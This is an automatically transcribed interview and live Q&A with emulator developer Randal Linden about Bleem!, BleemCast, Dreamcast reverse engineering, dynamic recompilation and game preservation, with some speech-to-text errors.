PlayStation 2 version right because around the same time the PlayStation 2 I think it came out I don't remember exactly 2002 2000 2001 something like that right yep yep and you being you right you know loving your technical challenges you know so yes that's true that that is very true I I love a technical challenge that's really what drives me when it comes to a project I like I like being able to do the things that people say oh this is not not possible this can't be done and then go ahead and accomplish it and the PlayStation 2 had just been announced and the Sega Dreamcast was already available and it was actually my business partner his name was David Herpelsheimer who suggested Blingcast in the first place and he just thought that that we both thought that the Dreamcast was a perfect machine it was very very well designed it it reminded me sort of of an advanced PlayStation and so I did some research into the processor and some of the technology behind the Dreamcast and decided that yes it had all of the components and hardware necessary to make Bling operational on a totally different it was to my knowledge it was one of the very first times that game console game was playable with enhancements on a competitors console at the same time that the original console was still available and in the market it I think was was unique especially definitely definitely don't get me wrong I love the Dreamcast it was it's one of my favorite consoles of all time it's actually my only the only Sega console I own and it's only and the reason for that is also the only Sega console I love and I was very you know sad to see it not gain as much success as we do yeah right so and there's a funny story so not about me but about you right so in one of the interviews as well you mentioned that you guys were actually invited to Sega right we were we were invited to Sega this is amazing but sorry yeah no no and I I I regret declining the invitation David went and Scott I think Scott Carol who is one of our attorneys he went to Sega and they flew them to Japan and they met with all of the top brass at Sega and and said effectively this is what we want to do and it was a tremendous opportunity and a tremendous honor and Sega ultimately said well we we can't really support you officially we can't really let you publish you know on on on the Dreamcast but here's a development system and here's some low level documentation and here's the phone numbers and email addresses of technical people in case you happen to have any questions but we can't really support what you're going to do and by the way there's this thing called mill CD that was only available in Japan at the time and we'll let you figure out what that means and so I reverse engineered the Sega Dreamcast because the it was called Katana the hardware system that we got on loan from Sega didn't have the mill CD support now for people that don't know what mill CD is mill CD is a regular CD wrong that was intended for like Japanese karaoke it was mill stands for I want to say multimedia interactive something and it was basically a regular CD that the Dreamcast could boot so there was this way of making manufactured discs that could run software on the Dreamcast that didn't have to be officially licensed approved or manufactured by Sega and so it was because of that the Dreamcast came into be we David made a little piece of hardware to dump the wrong from the Sega retail console because the Dreamcast development kit didn't support mill CD in fact they removed all the code that had to support reading regular CD wrong discs from the development systems they they removed it all so nobody had any idea that the Dreamcast could read regular CD wrongs and run games on them well it's sort of this is where sort of history branches at the same time that we realized that the code had to be in the retail version of the boot ROM another group in Europe called Utopia got a hold of a Sega development software kit and one of the programs that was in the software kit was a scrambler it was effectively a little tiny tool that took a program and jumbled it up in a particular order so that when you looked at the program it was all mixed up that if you put the program in this mixed up order onto a regular CD wrong the Dreamcast would boot it that was the piece of code that was missing from the Katana hardware development kits given out to all the developers so when we showed up at E3 with the bleeding cast running on the Sega Dreamcast people thought that Sega was supporting us but in fact they weren't we had reverse engineered their development system and their retail consoles and at the same time this other group of hackers reverse engineered and figured out the same kind of thing and it's sort of it was sort of bittersweet because while MilCD allowed BLEEM and BLEEMcast to exist it also opened the door for piracy on the Dreamcast which ultimately was one of the things I think that killed the platform. Yeah maybe I don't know I don't know is that I do remember that and I do remember partaking in that but those were different types but we were younger we had less money and a lot of things it's no excuse of course but. Well it is what it is I vaguely recall that and I don't remember the exact numbers but the original BLEEM on the PC was on a copy protected disc and the copy protection was broken within a day or less of it being released and the intention was because the software emulation was a work in progress the intention was that you would download the latest version from our website you put the BLEEM disc in the two would talk to each other and then you would put in a PlayStation disc and so this allowed us to update the software often and frequently I remember looking one day and wondering about piracy and BLEEM and how many pirated copies of BLEEM were out there because there were certain things that BLEEM did if it detected that it was running a pirated version and one of the technical support questions that our technical super people asked was a way of finding out were they running a real version of BLEEM or were they running a pirated version and I vaguely remember that we had 30 times the number of downloads compared to how many discs were actually sold so if we sold a thousand discs we ended up having 30,000 downloads of the BLEEM software even though we really should have only had a thousand so it sort of opened my eyes to piracy and as I said on the Dreamcast where you could get most any game and duplicate it on a regular CD-ROM it was the very same technology that made BLEEM, BLEEMcast possible but it also helped I think hurry along SEGA's demise they just couldn't compete. Yeah but instead Sony got mad at you not SEGA. Sony got mad at SEGA at D3 SEGA at their keynote mentioned BLEEM and BLEEM got a standing ovation from everybody who was attending SEGA's keynote Sony was not happy. They were not thrilled and I think partially it's because the licensing the way that games are licensed it's what's known as the Razors and Blades model where you buy a razor and the razor is inexpensive but you have to keep buying blades well the razor is the PlayStation console or the Xbox console and the blades that you have to keep buying are the games. Well if you could just go to a store and rent a game and play it on something other than the original hardware then it meant that the original hardware wasn't needed anymore and like I said I think one of the reasons that Sony was not happy with us was because people would be playing games on the PC and they'd be playing the games enhanced compared to playing it on a PlayStation. Yeah okay I'll try not to talk too much about Sony about this particular part. I have the greatest respect for Sony. Certain areas yes not this one in certain areas yes they could have come up with a better solution I think but. I think so too I wish that I wish they had seen the possibilities. I think and I don't know how the two companies are doing I think Sega saw that they could be a better software company than a hardware company and so Sega's still around today and they make great games and their games are playable on all sorts of platforms rather than on just one platform. I think especially with streaming services I think we're going to be seeing a shift where the home console isn't really a thing in the future. You subscribe to a service and the service can afford to have racks upon racks upon racks of really really really really high end hardware and the throughput the internet throughput is so high that it's just like you're playing it on a console that's that's sitting in your living room but instead of costing five or six hundred dollars to buy the console and then sixty dollars a game you're you're paying your monthly subscription fee. I think that's that's the model of where things are going who it is that ends up making the hardware I think there's probably going to be a shake out there's only going to be one or two companies that end up doing that but it would certainly put an end to console wars and things like that right now there's three or four different contenders for that market space and I still think there's a long way to go but I but I think that it's sort of ultimately the next evolution of where gaming is going to be where emulation is emulation is less critical because the hardware is more ubiquitous if that sort of makes sense. Sort of everywhere just like you get apps and you've either got an iPhone you've got an Android phone but apps these days they run on both phones and it doesn't matter what phone you've got you can still not not that the games are spectacular on either phones frankly but I think Sega I think Sega saw the writing on the wall and realized hey you know what we've we've got some great intellectual property some great characters some really great video games and and we're better as a software company than we are as a hardware company and I don't know if Microsoft and Sony and are there quite yet Google I think is going in the opposite direction where they are sort of got their hardware their Google branded hardware but then they've got their Stadia service. Yeah. This is sort of off topic from emulation. No but and about Microsoft I think Microsoft is actually like moving backwards I mean they are they're a software company and they got into the hardware game late and then they're competing the same way the other hardware companies are competing well that's nuts. It works for them and I mean they make a lot of money so they should be they are right and I'm wrong probably but you know. No you never know. I worked at Microsoft for almost 10 years. I worked on the Xbox 360. I was in the software development group. So I worked on what was called the XDK the development kit for the Xbox 360. I worked I was on a team that helped develop Kinect. Love it. I'm very sad and to see Kinect not doing as well as but I love Kinect. It has a love it had a lot of potential and I still use it or my kids use it but sorry carry on carry on sorry. No no no I think that I vaguely remember something like hearing that when Kinect came out it was the most popular accessory hardware accessory for a game console ever and it was very unique technology but I worked on Kinect. I also worked on Microsoft Band. That was the think Fitbit from Microsoft. It was a health and fitness band that did all sorts of things way way ahead of its time but Microsoft decided that that really wasn't the area they wanted to get into and so they closed down the Microsoft Band group and they offered a severance package and I said yes I'll take the severance package and take some time off and go back to my roots and that's when I developed Cyboyd. It's a 3D think Quake basically running on low end on Amazon, Fire TV stick, Fire tablets, Android devices and now working on.
|
In this interview/conversation, acclaimed emulator programmer Randal Linden takes us on a journey down the depths of reverse engineering and emulator development. Rather than editing this conversation to fit a smaller time-slot, it is split across 3 parts, with a Live Q&A at the end of part 3. Part 1 highlights: Doom FX for the SNES Bleem! Reverse engineering the MIPS R3000 The Sega Dreamcast
|
10.5446/53642 (DOI)
|
you I'm very curious how we did this with Windows because Windows would have gotten in the way, I think, right? It does, and it did. Okay. And, and BLEEM did a bunch of ugly tricks. And I say ugly, but BLEEM ran portions of its code in what's known as Ring Zero through a couple of backdoors and bugs in Windows. Yeah. And it did. And it did. Yes, effectively. The dynamic recompiler generated. Optimized x86 code. Then flushed caches and. Did. It used Windows. But yes, it, that's why BLEEM never ran on Windows NT. Because the backdoors and the hacks work on NT. Okay, okay. That's, that's a good one. And you mentioned jitting. And so do you, did you use also the same strategy? Like, you know, you profile the hotspots and then you recompile that in a certain way and then you decompile. Okay. No, no, what it did is it literally did dynamic recompilation while the program was running. So it, it was effectively just in time a jit compiler that knew which portions of the code had executed and which portions of the code hadn't yet executed. And when it went to execute them, it compiled them. Then it ran. All on the fly. Yeah, okay. That's very interesting. That's very, that's very elegant and beautiful. I mean, I thank you. No, it's complicated code. Yeah, exactly. And it's, it's complicated code for, for. Yeah, how did I say this, you know, it's, it's like straightforward for a purpose, right? It's not there for fun. It's not there for show. It's, you have a purpose you do it. You do it very well. And the result is excellent, right? And this is like the discussion from, yeah, or the discussion we didn't go into about, you know, the difference between high level emulation and like, like, so low level emulation, right, and high level, we want to run this game. We want to run it well, we want to, you know, enhance the game. Boom, right? So that's, that's how it goes. And the other way, which is also very nice and that's usually what you do for a hobby project, right? Yeah, sure, you want to emulate every like, you know, illegal opcode and, and, and like the thing with the V blank you mentioned. Yes. So, so yeah, dynamic compilation. Nowadays, everybody does it of course because. Yes, because you, because you can because it's, it is a commonplace technique. The beam is a blend of low level emulation and high level emulation. Blem sort of crosses the line between the two. There's the low level emulation of the processor, but higher level emulation of the graphics co processor and of the motion. And then there's the high level emulation of the sound chip, but high level emulation of the bios, for example. And then sort of a weird mix of both. And that's what allowed it to, that's, that's why on the Dreamcast, you could use the Sega Dreamcast VMU. Store PlayStation save games. Yeah, okay. Yes, that's true. Yeah, sorry. Yeah, okay. I'm thinking. Yeah. Yeah, okay, that is hard. So, yes, small question or so. So when you guys like, did you at any point like get a PlayStation development gets. No. Why not. I read. Because for obvious reasons we want to keep everything completely clean. Clean room. Didn't want. Sony to turn around and say, well, you've had access to all of our whatever technical information and hardware and so on. And I'm sure that if we had asked, no, so we just sort of did it independently. Yeah, okay. All right. I think the yeah, I have too many questions but you know, I told myself I'll try to keep this two hours and I think we're more than two hours now. So, so let's let's say I just have one more question. And after after that, you can you can talk about anything you want and we will see. I have all the time in the world, right so I can sleep like I said I'm too excited to sleep so no problem I've got I've got lots of time like I said I blocked off my whole afternoon. So we can just keep talking. And edit. Never portions. What, well, actually I'm thinking because because because this year fast them is is virtual. And they said because usually in fast them when you like have a development room. You say, okay, I want it for like half a day a day because of location a physical location. But this year they said so everybody's virtual so in principle, you can have as long as you want. So, because it fits between 10 and 6pm or 10am and 6pm. So technically speaking, we have two days, right and we already have exactly right so. No but it's like, this is too much too much to talk about this is just this is. My pleasure and my distinct honor to be able to talk at length. So I, I'm always amazed somebody has any interest in what I have to say. And so, if people want to hear, then I'm more than happy to talk. I'm always amazed at people that don't have interest in these kind of things and people like you, right. And to give you a short example, I was trying to explain to my wife. I have this amazing, you know, call I have to make and I'm trying to explain to her why and my wife is the least technical person on earth I think right so it didn't register with her but my enthusiasm did so she's happy for me. But that's about it right but I mean. Yeah, I mean, so, because. So yeah, so for your is for example the source code of doom right but blame for for obvious reasons wasn't released. So, you see this kind of interaction is more useful than the source code itself right because source code shows you the end result it doesn't tell you about the journey. It doesn't tell you about all the stuff you went through right and these and this this is this is amazing so right so. So if I end up, or we end up editing this, the full video should be posted somewhere and this will be done of course with your permission and such, right, because even I think somebody will find something useful in one of the jokes we made. And hopefully we won't be sued by Sony and right and or I don't think we made anybody else mad. I mean, but, but especially Sony less that's not that's not good super Sony, but. But, but one thing I was really curious about and this is gets it's basically right so. So it's actually next for BLEEM right before it stopped right so the things you had in your mind you wanted to implement right and I'm not sure if you can talk about this or not but. The next set. We're going to do more. BLEEM for Dreamcast. Final Fantasy seven. Spyro the dragon crash bandicoot. Crash Crash is one of those games that's very known for for how do I say this politely. There was recently one of the creators of crash he did like a video for ours, Technica, and he mentioned all the stuff they did to get the game working. And I'm not really certain most of the stuff is not the official way of doing things on the PlayStation so it would have been a very. Yeah, you're exactly. That's what I'm preaching for you. Yeah, yeah. Yes. Yes, that's exactly why I think that it would have been one of the great great games also one of my favorites was medieval. Because the graphics, the caliber of the game was just so, so high. It's a shame the Dreamcast died. I still have my dream cast. I don't use it but I do have it. I think a year ago or two years ago. Excuse me. There was something on the internet like like a hype because the website Dreamcast to was registered by Sega or something like that. And everybody was hopeful, but we haven't heard anything yet so who knows who knows. Everything is possible. Everything is possible. Everything is possible. And recently Shenmue 3 came out. No, I know Shenmue was one of my favorite games ever me to me to. So, it was the reason I got it. No, it wasn't a reason to cut the green cuts but that's something else. And with a for BLEEM, were there any like things on the roadmap for BLEEM, you know, because, like you said you started to interpret it, then compiled, re compiled and then jitted, so to speak. Was there like something after that. Yep, give me one second. Oh, sorry. Sorry. No problem. At that point. BLEEM had largely run its course. And by that I mean it was a challenge. How can I put this. It was a challenge to sell. Because stores were concerned about carrying the product. And so BLEEM for the PC sort of had run its natural course and then there was Connectix Virtual Game Station. And so we were at that point shifted and focused mostly on BLEEM for Dreamcast. And so the next set of games that we were going to do were Final Fantasy 7, Spyro, those games, because they were, we wanted games that were the pinnacle of each of their genres. Yeah, okay. But that's that's more from a business point of view and from the technical challenging point of view. What was your next Mount Everest so to speak. My next one was as it turns out to be Cyboyd. When I say, you know, think quake. It's a full 3D engine that was written. There is a video. There's a video online that shows I had it running on a Game Boy Advance. So yeah. Okay. It used a lot of self modifying code. It was all optimized arm assembly. Oh, we're talking assembly again. Okay. Yes. As a matter of fact, Cyboyd, you can get the game on Android phones. And Amazon Fire TV and Fire TV stick and it's a free game to download. But chunks of the game are from the original engine that's 1015 years old now. And so they're written in arm seven assembly. Okay. Yes. That's interesting. So that was the next, the next level, I think it was originally, as I said, designed for Game Boy Advance. I got it working on iPod video. I got it working on Cindy and cell phones. This was before cell phones had 3D graphics cards. Yeah. So to see a full 3D game on a cell phone. Nowadays, it's commonplace to see a full 3D game on the cell phone but back then, it was unheard of. Back when the phones weren't so smart. Exactly. When the phones weren't so smart. Nokia was everywhere. So we can use. So all the graphics and then have to be done in software. So Cyboyd was a sub pixel sub textal accurate high speed 3D engine. And mostly on arm. Arm is by far one of my favorite processors. Okay, let's let's hope they stay. They stay. They stay so. So, exactly. Well, now with with Mac using what they what they call Apple Silicon, which is basically arm. Yeah, they're here to stay. They're doing some cool stuff with emulation I heard so. Yes, exactly. They emulate x86 x64. Microsoft is doing the same on their on their surface and windows on arm that emulates. Yeah, yeah, I read a blog post about that. Yeah. But emulation is everywhere. Exactly. I kept keep telling people that but they don't believe me. So, yes. Yeah, no these days emulation truly is everywhere back. And when when BLEEM on the PC came out, emulation was rare. It was, it was exceptional. In the sense that it was very rare to come across something that needed emulation. And these days emulation is everywhere it's in backwards compatibility, it's in forwards compatibility it's in the average PC these days has not only emulation built into it, but emulators that run on it. And I think that's a good thing. Oh, absolutely. It's a good thing but one thing that still puzzles me. So it's, it's like, so emulation is everywhere. It's part of most things. And yet, if you go to Amazon and search for emulation books, you will find absolutely zero. I don't know if it's zero but a couple of years ago it was zero right if you go and search for papers on emulation. Okay, it's not zero but it's not papers on. I don't know what's something popular. You know anything, any graphics. Yeah, exactly any graphics thing or whatever right. If you go to conferences or YouTube and you search for emulation talks and conferences. And that's also not that much I have a playlist of all the videos I could find. I think it's like 10 videos, and like five of them talk about the same thing, right, and they're good videos but right so that's something that still puzzles me I'm not sure why that's the case but sorry, I'm just eventing I don't know emulation is one of the black arts of technology and programming emulation is sort of a niche. It's not like graphics. Where, you know, everybody Oh graphics. You know, the latest thing is now retracing with graphics and I remember back on the Amiga, where they had the bouncing ball juggler with the retrace balls and, and now that that could be done in hardware, but emulation is I think it's a technology that that it's a calling your either really into the emulation. seen as it were. Or you're using emulation and oftentimes people don't even know it. Like I said, backwards compatibility for games. So a good example. Apple's new Max that let you run the old software, transparently. I think emulation is one of those things where there isn't really a book on it. And it's not because it would have to sort of be more about the generic here's what you're trying to accomplish, rather than here's a concrete example of an emulator. Yeah. Yeah, yeah, yeah, you have a point. You have a point. I'm sad to say you have a point. Yeah, there isn't a big calling for for how to. Yeah, what you just said made me think about all those books on games and there are a lot of books on games, and yet they don't teach you much about games right so No, they don't they teach you. They'll teach you 3D math or they'll teach you 2D math and transformations and but it's harder to find a good book on games on writing games and all the complexity. It's sort of like the proliferation of games and apps on cell phones these days. They really sort of fall into one of a few categories one is the standard match three game, like Candy Crush. You've got the choose your outcome game with match three, like home scapes, you've got puzzle games like word combination games and then you've got card games. Often you'll have something like a call of duty or fortnight or something like that, which is tough to play on a cell phone anyway. But you won't have games that were from like back in the commuter 64 days like Broderbund. Games like Zeppelin or load runner or frantic Freddy on the commuter 64 just finding books about making those kinds of games is is harder. The latest project I'm working on is built on mono game, but before mono game was the platform of choice. I went through a couple of weeks of I looked at Unreal I looked at Unity. I don't even remember all of the platforms and libraries and tool sets and tool chains that I looked at before I finally ended up settling on mono game. And it's nice that there's all of these things that are that are available. I mean the, the, the Unity example comes with a full 3D platform game as a sample. Something like that would would, you know, take somebody a couple of years to build but here it is you just point and click and now you've got a Lego platform game with physics and 3D and everything and then it's, it's not particularly fun to play it. But it's nice that the technology is there. Somebody discovered that fun doesn't necessarily mean sales but yes, let's let's not get into that. That's a very frustrating discussion so it is it is today's independent developer is screwed. It's a different ways from Sundays. It is as an independent developer myself, it is very, very difficult to, to earn a living. Basically, people don't like ads. People don't like paying for games. And people don't like in app purchases. So, you're sort of stuck between a rock and a hard place. Yeah, I guess. And the last thing about what you just mentioned when we were talking about the books and such. So, so I'm not, you know, I'm not going to ask you how you learned so that's because it's different times of course and different mindsets but how do you think people can get better at reverse engineering or emulation developments. I don't know how do how can people practice. That's a good question. I would say that people should look at existing a lot of existing emulators are open source open source is wonderful. It's phenomenal. I can't say that enough that's why I released the source code to doom for the Super Nintendo on the Super FX chip. Because I think it's important to give back. I've been very, very fortunate to work on some, some great projects. I've been very, very blessed. I wanted to share the knowledge. And I think that if people would look at existing emulators and the source that's available. They'll get an idea of the complexities involved. Emulation of a given system. Oftentimes is the same you've got your processor, you've got some co processors you've got some extra chips. So find out as much as you can about the chips about the system about how things fit together. Look at existing emulation software technology, especially stuff that's open source. And read a lot of it is is reading. I mean reading code or reading literature. Both. Both. Code, I think you're right. In the code sort of shows you the end results. It doesn't show you the steps that it took to get there. But sometimes it's okay to, to know the answer. If you're in the right mindset, you can figure out what the question is. If you're looking at existing code and how existing code operates, you get the answer. But then you can go in and you can tweak it and see how things change. And I think that that's important. There aren't really books on emulation but there are books on the processor and and these days, as I said, most people don't have a processor manual because they've got a C compiler or they're writing in C sharp and it's in interpreted language or intermediate language. But one of the most interesting videos that I had seen recently for me personally was like I said, the process that this team of two or three people took to delaminate the data here, a 6502 processor. And it showed here's all the gates and here's how the gates operates and I, in my mind, because I had programmed it in machine language. I mean I still know low to immediate accumulator is a nine and X to zero is jumped to sub routine and hex six years return from sub routine and and so I programmed, knowing all of these op codes. But to see how the bits are actually implemented in the silicon was amazing. The technology that's 30 plus whatever years old now for the system over to is nothing compared to today's chips. But never stop learning I guess is the best advice I can, I can offer. It sort of goes back to there's always a better way of doing something there's always more efficient code cleaner code, more robust code or smaller code or whatever. But if you've got that quest for knowledge in that, that interest. It will keep you going and that, I think, is one of the key things that sets apart emulation programmers from other programmers. Yeah, okay. I was I was just triggered by something you said. I wasn't actually was my intention that this was the last question but this will keep going on. Unfortunately. But, but, so I was actually thinking did you actually worry about cycle accuracy during the BLEEM developments. No. Okay. Okay. cycle accuracy is There are pros and cons to cycle accuracy. The BLEEM is not cycle accuracy. But that doesn't matter. And it matters even less these days. Because games aren't like they were back on the 6502 or 62816 with the NES and the Super NES and the Sega Genesis and, and the PlayStation where you have to have lots of really complex code and it had to be timed and it had to be efficient and, and these days, your, your code. Your code is typically not the bottleneck in a given system. So, you know, the polygons you're trying to push or something else, and your code is running faster than the frame rate anyways and so generally speaking. No, BLEEM was not cycle accurate and it wasn't intended to be. Yeah, okay. We actually have a talk about the cycle accuracy. It's a short talk, but it's amazing. But, but, but you didn't have cycle accuracy is tricky. It's tricky, but so I don't want to spoil anything because I don't know in which order the talks will be but actually the speaker he kind of said, because I watched part of his talk because they should be uploaded and such. And he actually argues that cycle accuracy is. Yeah, kind of like a. It's not the most important metric you should try to adhere to. Let's leave it at that. I would agree. I would agree. And BLEEM is a good example of cycle accuracy being a measurement. But when it came to the enhancement of the games and the full screen, by linear filtering and and multi sample anti aliasing on BLEEM for Dreamcast cycle accuracy wasn't even part of the equation. But the results I think speak for themselves. Yeah, okay. That was almost most definitely. But you did you like. So like I said the questions just keep. Anyway, so, so did you like, like come across any bugs that were caused by the cycle accuracy of the PlayStation. And yes. Oh, yes. Yes, especially in later games. Later games are much more difficult to emulate at a high level, because programmers started writing directly to the hardware. And the code was much less efficient. And the code was much less efficient. But later games were much more efficient and they knew that if they did this sequence of operations, it would take this many clock cycles, and then they could do this sequence of operations. And it's sort of like the, the Pentium where you had your floating point pipeline and your integer pipeline and all these pipelines could be interleaved if you did certain things in certain order. And so yes, the, the later games in particular were tricky to emulate because BLEEM was not cycle accurate. Okay. And what about BLEEMcast because you're talking about too far and you know you don't have as much control as the PC of course right. So, actually had more control. Really. Mm hmm. BLEEMcast was actually nice because we had complete control of the system. Okay. And no, no OS security. Okay. I always assume because you know they have the Windows CE logo that it was like secured to hell and back right but No, everything was written to the lowest level straight to the metal. Really. Oh yeah. That's very interesting. Yeah, BLEEMcast was was all low level talking directly to the chips. I mean because at least those GD ROMs you couldn't read them really properly on the PC, right. Because. Well, you could. There were ways of reading them. Yeah. Okay. But I don't want to like inspire people to go in there. We did a lot of weird stuff with the dreamcast and. Yes. Okay. It was a misspent. Underlying operating system on the dreamcast even for dreamcast titles. You basically would write your title and link with Sega's libraries. But there was there wasn't really a low level like on Windows where there's an operating system that's running all the time. Okay, that's interesting. So for BLEEMcast we had complete control of the system, complete control of the hardware. It was it was a lot more work. Because there wasn't an operating system and because we couldn't use Sega's libraries. How did you actually. Okay, so how did you compile for the dreamcast without Sega's libraries. By writing straight to the hardware. And the structure. Oh, you wrote the executable for. Okay, that's amazing. And it's all SH4. Yeah. Okay. Hitachi thing or something. Yes, Hitachi SH4. And we had all the documentation to the PowerVR chip set. And to the Sega Dreamcast chip set. And we knew what registers to write what values to do certain things and it was all written in low level assembly language. Uh huh. Because because Sega, Sega provided all of the information, but said, we can't endorse you we can't really support you. We can't publish your title. So we have no level hardware documentation that we don't give to anybody else. For all the different chips that are in the dreamcast. Enjoy. Okay. And psycho accuracy was never a problem that or it was. No, it wasn't. It wasn't a problem because the game was running faster. And it was waiting for vertical blank rather than the emulation running slow. The same dynamic, dynamic optimizing the recompiler that I wrote for the PC that took MIPSR 3000 code and generated x86. I wrote one that took MIPSR 3000 code and generated optimized SH4. Really. Yeah. Let me write that down. Are you allowed to do that? I mean, does the dreamcast allow you to do that because you're basically changing the running code. Yes, exactly. Wow. And then the dreamcast I don't remember how much ram they had but it wasn't a lot. It was enough. Yeah, there was more than enough for writing optimized SH4 code. Because the PlayStation was very limited. Yeah, compared to the dreamcast and a PC. Okay. Yeah. There was never more than if the dynamic recompiler ran out of memory, it would just flush everything and start again. And so there wasn't really ever running out of memory. Yeah, okay. It basically recompiled blocks of code. And it just kept it in a big buffer. Yeah. And when it ran out of space, it started from scratch again and said okay pretend that none of the code is compiled yet. Start recompiling. Your game would like slow down for a bit till it like warms up again and Imperceptibly because it happened so fast. But yes. This is, you would never imagine all that was going on. Exactly. On a totally totally foreign system. Yeah, yeah, that's amazing. Thank you. It's truly is the shame. So, you know, we will never see the code, but who knows. Maybe somebody out there will reverse engineer it for us and I guess I saw your doom code right and and one thing that really so I haven't threw all the code and I'm not that good at assembly but one thing that really jumps out at me it was how well it was documented. Thank you. No really because so and I'm not trying to offend anybody but because the principal has been complimented on my code. I mean, it was, but you know because undocumented C code I don't have a problem with okay I have a problem with that but it's still C code but undocumented assembly code right that's that's, and it's very well structured very well documented and so I thank you. I hope whoever reverse engineers blame documents and structures it in the same way so let's just say. The code is. Well, that's what you get when you spend 38 years writing code, you sort of build up a degree of self documentation because eventually you'll go back and it makes it more maintainable. And the code from, I want to say it was 9596 was the super effects code I think roughly a long time ago. But still, it was very nice and I'll look through it and see how it works out. Well, thanks. Well, like I said, there's an even better way of doing it now. Yeah. So with emulation so that's always nice. You meant running it. Sorry, or at least that's what I meant. Right. So yeah, I don't. Yeah. I'm looking at my list of questions, because I wrote a lot of questions beside the questions that I sent you, you know, like I said, I couldn't sleep so I kept writing stuff and whatever but yeah. So do you have anything that you think we should have talked about and we didn't talk about. I don't think so. I think we covered a whole bunch of different things. Yeah, okay. Yeah, yeah. Yeah, I can always come up with questions but I think, you know, enough should be enough at some point. Okay, I've kept you for a very long time now and no trouble at all. I'm very, very grateful. I think a lot of people will be grateful. I mean, you mentioned you will be, or you will try at least to be available for Q&A. I will. I will be available for Q&A. As soon as you tell me when it's scheduled, I will make sure that I'm up either very early or very late. Yeah, we will set it up. And I hope, so yeah, this is our first time doing this at FOSDOM. FOSDOM usually has like a lot of rooms, developer rooms and we usually have like a retro computing room and there's some, there's some emulation talks there but this year we thought let's try to do a dedicated emulator room. So it's the first edition and so far the talks have been good, like the proposals and I hope a lot of people attend and have a lot of cool questions for you, right? So that's what I'm building up towards. You've been great. You've been awesome. I don't know how to thank you actually. My pleasure. My pleasure. It's been an honor. The honor was all mine really. So thank you very much again. I don't know. That's that's the end. Yeah, okay. It's very sad to say that. So I'll probably stop, you know, cut the video at this point and this. Sure. Well, if you come up with more questions and you want to have another hour chat or something. You're spoiling me. You're spoiling me. Right. Not at all. Yeah, so I'm taking a quick look and seeing if we went. I think we got to. I think we got through all of the questions that you'd written down but I'm sure that there's a whole bunch more that are always are the always are this. It's a problem right so and that's good though that's good it's. I don't know if you're going to share the. Yeah, but you know right like so so you're a very kind person and I don't want to like miss you that you're such a kind person and just keep you talking for a couple of hours or just bug you out of nowhere and that kind of stuff so no problem. It's thank you very much for that. This is awesome. I don't know how it is going to work out. We will plan the Q&A of course and we'll see how it goes. Thank you very much again. I look forward to being online and answering some questions and chatting with the audience. I'm very sure there'll be a lot of questions but we'll see. So, and a lot of more advanced questions because you know I'm not that active in emulators more as I used to be, but some of the more advanced people will ask questions that you will enjoy more than my questions I think so. I have enjoyed your questions immensely. Thank you. Thank you. Thank you. Thank you so much. Thank you. Thank you. So thank you again. Enjoy the rest of your day and I will keep you in the loop. I guess for the things. What about the super FX chip for a while, right? I think we're doing live Q&A, by the way. Let me just get one second here, see how we're doing. Yeah, I'm just waiting for the bot to announce that channel thing again. Yep. Hey, we're getting some questions as well. Have you been eating as well? It's been a long day. It's been a long day. I have. In between, I've been eating and I've had by my coffee and my tea and... All right, good. Good. Yeah, I've also been running back and forth between sessions. Okay. And we are live. Yes, we're live. Excellent. Now, if that bot would just do that one message, right? Otherwise, we can just go ahead, but I think it's a bit nicer to wait. Yeah, yeah. What are we waiting for? I thought the bot would give our links in the chat again. No, no, no, no, no. This is part of the live Q&A. This is on the live feed. Gotcha. We have like 40 minutes on the live feed, I think. That's perfect. All right, so let's just go ahead then. Sure. Welcome back, everybody. This time we've got Mahmood in the video as well. I think we're just going to do some audience questions and then... Dressed as Waldo for the people who know who Waldo... Yeah, that's amazing. So, let's start strong and then just sort of fizzle out. I'm going to do some audience questions here. And some of them have already been asked, but just now we got a new one. Let's start with the fresh one. Pegasus Ryder asks, how is the machine language translation implemented? For BLEEM, it was done in Pentium, all assembly code, where it took each instruction and dynamically optimized the MIPS op codes into Pentium x86 instructions. And on the Dreamcast, on the BLEEMcast, it took the MIPS R3000 and generated optimized SH4 for the Hitachi processor. Does that answer? We'll have to wait for Pegasus Ryder's response, but in the meantime, we'll move on. Another relay question that you've answered in the chat, but let's put it here for posterity. What was source control like back in those days? Yeah, back then, none. There was none. There was no source control because it was just me on the PC, so there wasn't any source control. And on the BLEEMcast, there was just myself and there was Rod. And so between the two of us, we didn't really need source control either. But if there were more developers or if there was a lot of art assets, things like that, we would have definitely needed some sort of source control. But back then, this was around the time when there was, I want to say SVN and Tordis. And I want to say there was Microsoft Source Safe, because I remember there was some big bug where all of a sudden you lost all your code. There was no source code version control. Nothing ever was wrong? No, nothing ever went wrong. Usually I'm a fairly organized person. So yeah. We also saw the notes, so we know how organized you are. Yes, those are real notes from the Dreamcast development process. So yeah, you can see I did this to this day, still use a pencil and a notebook with written notes on it. So in theory, we can rebuild BLEEM from your notes? Theoretically, yeah. Okay, but a follow up question for the source control question is because when you got to BLEEMcast, you had somebody working with. Did you guys do code reviews of each other's code? Not really. We were working on different areas of the code. I was doing the vast majority of the code and Rod was helping out. So pretty much it was coming from BLEEM on the PC. A lot of it, I don't want to say was translating, but it was a lot of it was translating because I had already done the majority of the reverse engineering. So it was sort of like doing a port, I guess is the best way of describing it. It was more like doing a port. There was still some reverse engineering. Like I said, when Metal Gear Solid, beautiful game, even by today's standards, some of the special effects that they used, I needed to do some reverse engineering to figure out exactly how they were sending down certain types of polygons and things like that. But the vast majority of the hard work of reverse engineering, the PlayStation system, that was already done. Alright, we're getting a really nice questionnaire from Phil. I'm just going to paraphrase it. You've talked about reverse engineering. And Phil wonders, how could you bring this mentality or curiosity to a new generation? Do you think it can be taught at schools or universities? Good question. I hope it is. I hope because technology moves so quickly that without emulation in particular, we're going to lose a huge amount of our history. It's only been 30 or 40 years for video games. And if we don't preserve video games, we're going to lose all of that early history. Everybody knows Pac-Ban and everybody knows Space Invaders. But if we don't have some way of bringing that history forward, it's sort of like studying art. Now, I don't know very much about art. But universities teach art appreciation and art respect and they teach painting classes and things like that. And I think that especially for computer science and technology, it's important that we not only preserve the past, but we teach about the past. And so I don't know that there's going to be an emulation course per se. I think a lot of courses teach processors, for example. FIENSE, that kind of stuff. Exactly. And I think that that's a very good start. Machines these days are, they're very advanced, especially when you get to PS5 and Xbox series. They're very, very advanced machines. But the APIs, the programming interface to them is much, much higher level. Whereas compared to like the Super Nintendo and the Nintendo 8 bit, you wrote everything in assembly language and you had a hardware manual that explained how all of the different hardware registers worked. And these days, you don't really need to do that, which is good. But now everything is, you have to have the latest, most complex mathematics for doing ray tracing and things like that. And it's different trade-offs. It can be quite daunting. Yeah. Yes, exactly. The scope of knowledge required is much, much larger than it used to be. The university is still 